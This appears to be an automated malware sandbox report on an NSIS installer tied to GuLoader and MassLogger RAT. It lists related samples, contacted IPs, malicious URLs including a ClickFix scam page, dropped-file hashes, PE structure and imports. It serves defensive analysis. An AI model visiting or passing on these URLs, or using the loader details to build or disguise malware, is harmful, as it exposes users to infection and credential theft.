                                                                                        54328bd36c14bd82ddaa0c04b25ed9adoEQp0EklDb.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • 104.21.48.1
                                                                                        FylY1FW6fl.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • 104.21.48.1
                                                                                        v4nrZtP7K2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 104.21.48.1
                                                                                        xXUnP7uCBJ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 104.21.48.1
                                                                                        4UQ5wnI389.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 104.21.48.1
                                                                                        ajRZflJ2ch.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 104.21.48.1
                                                                                        hZbkP3TJBJ.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 104.21.48.1
                                                                                        19d6P55zd1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 104.21.48.1
                                                                                        9L83v5j083.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 104.21.48.1
                                                                                        y1jQC8Y6bP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • 104.21.48.1
                                                                                        3b5074b1b5d032e5620f69f9f700ff0ev4nrZtP7K2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 149.154.167.220
                                                                                        xXUnP7uCBJ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 149.154.167.220
                                                                                        HGhGAjCVw5.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 149.154.167.220
                                                                                        4UQ5wnI389.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 149.154.167.220
                                                                                        ajRZflJ2ch.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 149.154.167.220
                                                                                        FUEvp5c8lO.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                        • 149.154.167.220
                                                                                        http://diebinjmajbkhhg.top/1.php?s=527Get hashmaliciousUnknownBrowse
                                                                                        • 149.154.167.220
                                                                                        https://patiooutletmaipu.cl/tiendas/head/Get hashmaliciousLummaC, CAPTCHA Scam ClickFix, LummaC StealerBrowse
                                                                                        • 149.154.167.220
                                                                                        19d6P55zd1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        9L83v5j083.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        37f463bf4616ecd445d4a1937da06e19v4nrZtP7K2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 172.217.23.110
                                                                                        • 142.250.186.161
                                                                                        xXUnP7uCBJ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 172.217.23.110
                                                                                        • 142.250.186.161
                                                                                        4UQ5wnI389.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 172.217.23.110
                                                                                        • 142.250.186.161
                                                                                        ajRZflJ2ch.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 172.217.23.110
                                                                                        • 142.250.186.161
                                                                                        https://patiooutletmaipu.cl/tiendas/head/Get hashmaliciousLummaC, CAPTCHA Scam ClickFix, LummaC StealerBrowse
                                                                                        • 172.217.23.110
                                                                                        • 142.250.186.161
                                                                                        IpykYx5iwz.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                        • 172.217.23.110
                                                                                        • 142.250.186.161
                                                                                        FILHKLtCw0.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 172.217.23.110
                                                                                        • 142.250.186.161
                                                                                        ht58337iNC.exeGet hashmaliciousGuLoaderBrowse
                                                                                        • 172.217.23.110
                                                                                        • 142.250.186.161
                                                                                        ppISxhDcpF.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 172.217.23.110
                                                                                        • 142.250.186.161
                                                                                        m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 172.217.23.110
                                                                                        • 142.250.186.161
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        C:\Users\user\AppData\Local\Temp\nsvC041.tmp\System.dllv4nrZtP7K2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          xXUnP7uCBJ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            4UQ5wnI389.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                              ajRZflJ2ch.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcosBrowse
                                                                                                  DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousUnknownBrowse
                                                                                                    KO0q4biYfC.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                      Yoranis Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                        Yoranis Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                          Pralevia Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                                                            Process:C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 2560x2560, components 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):484658
                                                                                                            Entropy (8bit):7.809711763657168
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12288:W1S3xo63wl4biprI2S4WwWEcwxg9dvVAxZOCLF0DB:Wo3xX3y4bz2lWwWo6rSTZyd
                                                                                                            MD5:5C727AE28F0DECF497FBB092BAE01B4E
                                                                                                            SHA1:AADE364AE8C2C91C6F59F85711B53078FB0763B7
                                                                                                            SHA-256:77CCACF58330509839E17A6CFD6B17FE3DE31577D8E2C37DC413839BA2FEEC80
                                                                                                            SHA-512:5246C0FBA41DF66AF89D986A3CEABC99B61DB9E9C217B28B2EC18AF31E3ED17C865387223CEB3A38A804243CF3307E07E557549026F49F52829BEBC4D4546C40
                                                                                                            Malicious:false
                                                                                                            Reputation:low
                                                                                                            Preview:......JFIF.....,.,.....]http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.2-c000 79.566ebc5, 2022/05/09-07:22:29 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:exif="http://ns.adobe.com/exif/1.0/" xmp:CreatorTool="Adobe Photoshop CC 2018 (Windows)" xmp:CreateDate="2018-04-27T15:00:27+08:00" xmp:ModifyDate="2022-09-22T14:01:54+08:00" xmp:MetadataDate="2022-09-22T14:01:54+08:00" dc:format="image/png" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:b728d5c8-8822-6d4c-afc1-a393cb2a04ec"
                                                                                                            Process:C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):112291
                                                                                                            Entropy (8bit):1.249420131631438
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:768:5R+BCpkJWjYWL2MxTVLvUjpGqik9JiAfWA2DBQwD1PzUH+HYZmIo7x31sT:WCZY21w0I2NZYD
                                                                                                            MD5:4D1D72CFC5940B09DFBD7B65916F532E
                                                                                                            SHA1:30A45798B534842002B103A36A3B907063F8A96C
                                                                                                            SHA-256:479F1904096978F1011DF05D52021FAEEE028D4CF331024C965CED8AF1C8D496
                                                                                                            SHA-512:048844A09E291903450188715BCDDF14F0F1F10BEAFBD005882EBF5D5E31A71D8F93EEBE788BD54B4AED2266C454F4DCA18AF4567977B7E773BBE29A38DEA45B
                                                                                                            Malicious:false
                                                                                                            Reputation:low
                                                                                                            Preview:..........P............+......................................................................................................................X......n..(................G...................................m.........|.......................U.............`............l..............@}.........a........................................s............y.................N...............B...............w.e..........................................Q......*...................................................................................................a...........................f..................p..................t...........................................9.Q................@....................e................................................................:..............P.......S.........................P........................9..............._.......................(...............N............................................................H.T..........c..............................
                                                                                                            Process:C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):362089
                                                                                                            Entropy (8bit):1.23992084267325
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:768:xOeaameETrlE0+1mGOWb3h5WAV0hW+JSLSwzj2HlSdL0f6mhKZRaqOzWz6szt3cA:x+ds5dYOVxIW3hhdeRt6MeZ1W4vB
                                                                                                            MD5:A4340182CDDD2EC1F1480360218343F9
                                                                                                            SHA1:50EF929FEA713AA6FCC05E8B75F497B7946B285B
                                                                                                            SHA-256:B91E5B1FF5756F0B93DCF11CBC8B467CDA0C5792DE24D27EC86E7C74388B44B3
                                                                                                            SHA-512:021F198AFF7CCED92912C74FC97D1919A9E059F22E99AB1236FBAA36C16B520C07B78F47FC01FCFAC1B53A87CDAE3E440D0589FA2844612617FAB2EDB64A3573
                                                                                                            Malicious:false
                                                                                                            Reputation:low
                                                                                                            Preview:..........F.............................i.....................B.........................................b..Et.............................O...........h...............................................................................8..........n.....................w.................../.......|.......'........,..........(...........................W......#..................................................................................................=..........................]..........q................................................[.................2....S............................"...................................$!..............................=.......................................[f.................................................................................................................V.............................w...................................................$.............................................................j...........h.............J..............
                                                                                                            Process:C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):63485
                                                                                                            Entropy (8bit):4.609086692342101
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:1536:SKthVYWWHkAbelzwwZaafbnqLkwjpPkVfBi2+rE:va/KlzwEa+bEtjpPkt826E
                                                                                                            MD5:E5A2D1496CFC88DC0B5AF9C47B132D2E
                                                                                                            SHA1:512FA4CC35564E99A301A10013B6CC5905E099CF
                                                                                                            SHA-256:866F02DFDDCEC65A8A60CDD1EA535998F743C14F0074C412F37DFAFFD83945EE
                                                                                                            SHA-512:A7B94E5DB134A9CF95525E4803719A99A6801E6B0D7B8F82589718359B2F516D8FABC98BBA90E8CD6078839EF2BB2410E4529B3B9D28093D7E02842BC9F2BE0D
                                                                                                            Malicious:false
                                                                                                            Reputation:low
                                                                                                            Preview:....................WWW....XX._....||.................F.........Z.BB...;;.!.....TTT...D....NN....JJ..........JJ............Z.....3.....[.vvvv............ ...aaa.l.B...........2.N...???...222.........TT...........::.^...........................m......,,,.A...J.....333..######.....GG.............ZZZ.|......R................................444.....;;............z..{{{{.SS......NN....::................................iiiii.......jj..=.................pp.ff......YYYY.Z.==.....k..................qq....77..0....................L.v.....kk..........I..................................!!.999................IIIIIII.......PPP...u.....j...qqq....j....................2.g.7......................|........?........}..............E..../..q........qq.7.......E.w......yyyy.......b.....dd............##.....$$...>>>..................}}}}}..LL........OO...3333...................^....xxxxxx..1.....Y..oo.........oo..........x......&&......5............p........AAAAA.._...............?.j...ZZ.............
                                                                                                            Process:C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            File Type:FoxPro FPT, blocks size 22, next free block index 285212672, field type 0
                                                                                                            Category:dropped
                                                                                                            Size (bytes):139354
                                                                                                            Entropy (8bit):1.2473328695625903
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:768:9OsMSh8lSnJGyUzWZsO2ipzPFmDZC9kpzroto48tf2+5lVp:9delFlqNawgJp
                                                                                                            MD5:B0FB6B583D6902DE58E1202D12BA4832
                                                                                                            SHA1:7F585B5C3A4581CE76E373C78A6513F157B20480
                                                                                                            SHA-256:E6EA5F6D0C7F5FA407269C7F4FF6D97149B7611071BF5BF6C454B810501AE661
                                                                                                            SHA-512:E0894FFBD76C3476DC083DAFD24F88964BF6E09E4CA955766B43FE73A764A00247C930E9996652A22B57B27826CD94F88B8178514060CA398DE568675F9E4571
                                                                                                            Malicious:false
                                                                                                            Reputation:low
                                                                                                            Preview:.......................................|...................................................................+................$......&....A........................................................Z.....................................A...............!.....Y........................l..........9..................c.............f.................F...".................................................h.......................................\..............J............................5......t.....E.................q........................:......^....................................................................................I..........................................................x......W....................................................................................M...........................X..............................,..................m.......................................................................................................................J........ ...F...........
                                                                                                            Process:C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):278454
                                                                                                            Entropy (8bit):7.733077471052493
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6144:11v15hYhwfvjrsY8Bjfv9XQ7Un0nDx6keCjAZsfqZy+Iht:rPhMwnIBjfv9oU0l467fcFID
                                                                                                            MD5:552915D0B28A2E0CBB0C784E98B87100
                                                                                                            SHA1:62B24DFF815E529CD261D090620636E7E84C26EE
                                                                                                            SHA-256:1FE9053F9C73FF2A1A164BA44EBDA2B407D619C5A4A257AE43933CAE4174DFF6
                                                                                                            SHA-512:1BAB2EAA55233C017F78E6B273482F26CADEC820E6A1CA6BA7D3C4440035D70FE539B68FF70EC8DE38D8B63CFB830C498CB23277845BCA24E9B1DC739F7F0595
                                                                                                            Malicious:false
                                                                                                            Preview:..AA..ZZ..ooooo..........................................]]]]]].?.1.s......eeee...))).............#.P........\\\.........^.....o.e...&...........i.......}}...SS..............'....LLLLLLLLL........QQ..fffff...|.''........J......3.............................oo.....q................m....fff......l....SS.....r.........333.t................ffff...............AA.....B..........22.................................*.P.....:...........4........h....<...jj.XX.............................V................d.....v..ZZ.....pp...............w.ZZZ...............<<...c................1................................666.....u.>..Q............................,..................$.......................................................EE.>.$$....................JJ...eee..................~~..@@...............................44...................~........mmm.LL.G..........?????..........o.....pp.... ..................xx...\\....6..TT...[......NN.vvvv.z..............................???..............bbbb.....
                                                                                                            Process:C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1466542
                                                                                                            Entropy (8bit):5.475333743152048
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:CpxIBjtop+6oFIco3xX3y4bz2lWwWo6rSTZyA7:vBp2+lToBXbz2luo6rS1yk
                                                                                                            MD5:BAFB29716B15ABA70CFBC82534C578B1
                                                                                                            SHA1:0293ACA2FEB6762BD33B2737CDB90816324C99E9
                                                                                                            SHA-256:98D20F1840935C2832F5137E3245727A82FF65BB696CBD75C7C3191B7567A0F8
                                                                                                            SHA-512:673909F96BE6A57733CCE9CB756F45CA1E8908C89F69DA8837875F1BF05F4E6841D03BBE2BB6485C03F5DB9B84E49035AB06AD479F6AF05AE1C5226F460A546C
                                                                                                            Malicious:false
                                                                                                            Preview:<6......,.......,.......\........!.......4.......5..........................M...i............................H..............................................................................................................................................................................G...J...............h...............................................................g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):12288
                                                                                                            Entropy (8bit):5.719859767584478
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:1enY0LWelt70elWjvfstJcVtwtYbjnIOg5AaDnbC7ypXhtIj:18PJlt70esj0Mt9vn6ay6
                                                                                                            MD5:0D7AD4F45DC6F5AA87F606D0331C6901
                                                                                                            SHA1:48DF0911F0484CBE2A8CDD5362140B63C41EE457
                                                                                                            SHA-256:3EB38AE99653A7DBC724132EE240F6E5C4AF4BFE7C01D31D23FAF373F9F2EACA
                                                                                                            SHA-512:C07DE7308CB54205E8BD703001A7FE4FD7796C9AC1B4BB330C77C872BF712B093645F40B80CE7127531FE6746A5B66E18EA073AB6A644934ABED9BB64126FEA9
                                                                                                            Malicious:false
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Joe Sandbox View:
                                                                                                            • Filename: v4nrZtP7K2.exe, Detection: malicious, Browse
                                                                                                            • Filename: xXUnP7uCBJ.exe, Detection: malicious, Browse
                                                                                                            • Filename: 4UQ5wnI389.exe, Detection: malicious, Browse
                                                                                                            • Filename: ajRZflJ2ch.exe, Detection: malicious, Browse
                                                                                                            • Filename: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, Detection: malicious, Browse
                                                                                                            • Filename: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, Detection: malicious, Browse
                                                                                                            • Filename: KO0q4biYfC.exe, Detection: malicious, Browse
                                                                                                            • Filename: Yoranis Setup.exe, Detection: malicious, Browse
                                                                                                            • Filename: Yoranis Setup.exe, Detection: malicious, Browse
                                                                                                            • Filename: Pralevia Setup 1.0.0.exe, Detection: malicious, Browse
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L....~.\...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                            Entropy (8bit):7.958311504672689
                                                                                                            TrID:
                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                            File name:6mGpn6kupm.exe
                                                                                                            File size:1'002'919 bytes
                                                                                                            MD5:89bb4eeab81b80681733b2d7df68289b
                                                                                                            SHA1:655666fc351362a9aa37758163d3e3e63c6400b8
                                                                                                            SHA256:2c399d3af3092bf9b9d0ed6c4b7bef3ac082cf09d9947adc9df12d11a6fea3d1
                                                                                                            SHA512:629ba1abc689e0bb4754502d7a3c770eddb9d8a75dc3bb6ec09dfa349d681c3b8ae90631c943c7ad1a89e488a89085d411d96db0ef7702d64ca050db14018358
                                                                                                            SSDEEP:24576:9jwKCNSDUFkaOGthsOeScPVoKCcHFYq4M7eq7kt:V1CiUVdXeSwWWYqaBt
                                                                                                            TLSH:96253307E761C6AAD02AC2F01DB5B39D5F99DC29990091D7B2303C5EBD63B470D3AB94
                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...$..\.................f...*.....
                                                                                                            Icon Hash:46224e4c19391d03
                                                                                                            Entrypoint:0x4034a5
                                                                                                            Entrypoint Section:.text
                                                                                                            Digitally signed:false
                                                                                                            Imagebase:0x400000
                                                                                                            Subsystem:windows gui
                                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                            Time Stamp:0x5C157F24 [Sat Dec 15 22:24:36 2018 UTC]
                                                                                                            TLS Callbacks:
                                                                                                            CLR (.Net) Version:
                                                                                                            OS Version Major:4
                                                                                                            OS Version Minor:0
                                                                                                            File Version Major:4
                                                                                                            File Version Minor:0
                                                                                                            Subsystem Version Major:4
                                                                                                            Subsystem Version Minor:0
                                                                                                            Import Hash:1f23f452093b5c1ff091a2f9fb4fa3e9
                                                                                                            Instruction
                                                                                                            sub esp, 000002D4h
                                                                                                            push ebx
                                                                                                            push esi
                                                                                                            push edi
                                                                                                            push 00000020h
                                                                                                            pop edi
                                                                                                            xor ebx, ebx
                                                                                                            push 00008001h
                                                                                                            mov dword ptr [esp+14h], ebx
                                                                                                            mov dword ptr [esp+10h], 0040A230h
                                                                                                            mov dword ptr [esp+1Ch], ebx
                                                                                                            call dword ptr [004080ACh]
                                                                                                            call dword ptr [004080A8h]
                                                                                                            and eax, BFFFFFFFh
                                                                                                            cmp ax, 00000006h
                                                                                                            mov dword ptr [0042A24Ch], eax
                                                                                                            je 00007FFB10D081B3h
                                                                                                            push ebx
                                                                                                            call 00007FFB10D0B47Dh
                                                                                                            cmp eax, ebx
                                                                                                            je 00007FFB10D081A9h
                                                                                                            push 00000C00h
                                                                                                            call eax
                                                                                                            mov esi, 004082B0h
                                                                                                            push esi
                                                                                                            call 00007FFB10D0B3F7h
                                                                                                            push esi
                                                                                                            call dword ptr [00408150h]
                                                                                                            lea esi, dword ptr [esi+eax+01h]
                                                                                                            cmp byte ptr [esi], 00000000h
                                                                                                            jne 00007FFB10D0818Ch
                                                                                                            push 0000000Ah
                                                                                                            call 00007FFB10D0B450h
                                                                                                            push 00000008h
                                                                                                            call 00007FFB10D0B449h
                                                                                                            push 00000006h
                                                                                                            mov dword ptr [0042A244h], eax
                                                                                                            call 00007FFB10D0B43Dh
                                                                                                            cmp eax, ebx
                                                                                                            je 00007FFB10D081B1h
                                                                                                            push 0000001Eh
                                                                                                            call eax
                                                                                                            test eax, eax
                                                                                                            je 00007FFB10D081A9h
                                                                                                            or byte ptr [0042A24Fh], 00000040h
                                                                                                            push ebp
                                                                                                            call dword ptr [00408044h]
                                                                                                            push ebx
                                                                                                            call dword ptr [004082A0h]
                                                                                                            mov dword ptr [0042A318h], eax
                                                                                                            push ebx
                                                                                                            lea eax, dword ptr [esp+34h]
                                                                                                            push 000002B4h
                                                                                                            push eax
                                                                                                            push ebx
                                                                                                            push 004216E8h
                                                                                                            call dword ptr [00408188h]
                                                                                                            push 0040A384h
                                                                                                            Programming Language:
                                                                                                            • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x550000x21068.rsrc
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                            .text0x10000x64090x6600bfe2b726d49cbd922b87bad5eea65e61False0.6540287990196079data6.416186322230332IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                            .rdata0x80000x13960x1400d45dcba8ca646543f7e339e20089687eFalse0.45234375data5.154907432640367IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                            .data0xa0000x203580x6008575fc5e872ca789611c386779287649False0.5026041666666666data4.004402321344153IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            .ndata0x2b0000x2a0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            .rsrc0x550000x210680x2120003ed2ed76ba15352dac9e48819696134False0.8714696344339623data7.556190648348207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                            RT_BITMAP0x554c00x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                                                                                            RT_ICON0x558280xc2a3PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9966684729162903
                                                                                                            RT_ICON0x61ad00x86e0PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.990210843373494
                                                                                                            RT_ICON0x6a1b00x5085PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9867559307233299
                                                                                                            RT_ICON0x6f2380x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.4358921161825726
                                                                                                            RT_ICON0x717e00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.4896810506566604
                                                                                                            RT_ICON0x728880xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.5367803837953091
                                                                                                            RT_ICON0x737300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.6913357400722022
                                                                                                            RT_ICON0x73fd80x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.38597560975609757
                                                                                                            RT_ICON0x746400x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.4934971098265896
                                                                                                            RT_ICON0x74ba80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.651595744680851
                                                                                                            RT_ICON0x750100x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.46908602150537637
                                                                                                            RT_ICON0x752f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.5472972972972973
                                                                                                            RT_DIALOG0x754200x120dataEnglishUnited States0.53125
                                                                                                            RT_DIALOG0x755400x118dataEnglishUnited States0.5678571428571428
                                                                                                            RT_DIALOG0x756580x120dataEnglishUnited States0.5104166666666666
                                                                                                            RT_DIALOG0x757780xf8dataEnglishUnited States0.6330645161290323
                                                                                                            RT_DIALOG0x758700xa0dataEnglishUnited States0.6125
                                                                                                            RT_DIALOG0x759100x60dataEnglishUnited States0.7291666666666666
                                                                                                            RT_GROUP_ICON0x759700xaedataEnglishUnited States0.6091954022988506
                                                                                                            RT_VERSION0x75a200x308dataEnglishUnited States0.47036082474226804
                                                                                                            RT_MANIFEST0x75d280x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                                                                            DLLImport
                                                                                                            KERNEL32.dllExitProcess, SetFileAttributesW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, SetCurrentDirectoryW, GetFileAttributesW, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, GetShortPathNameW, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalUnlock, GetDiskFreeSpaceW, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
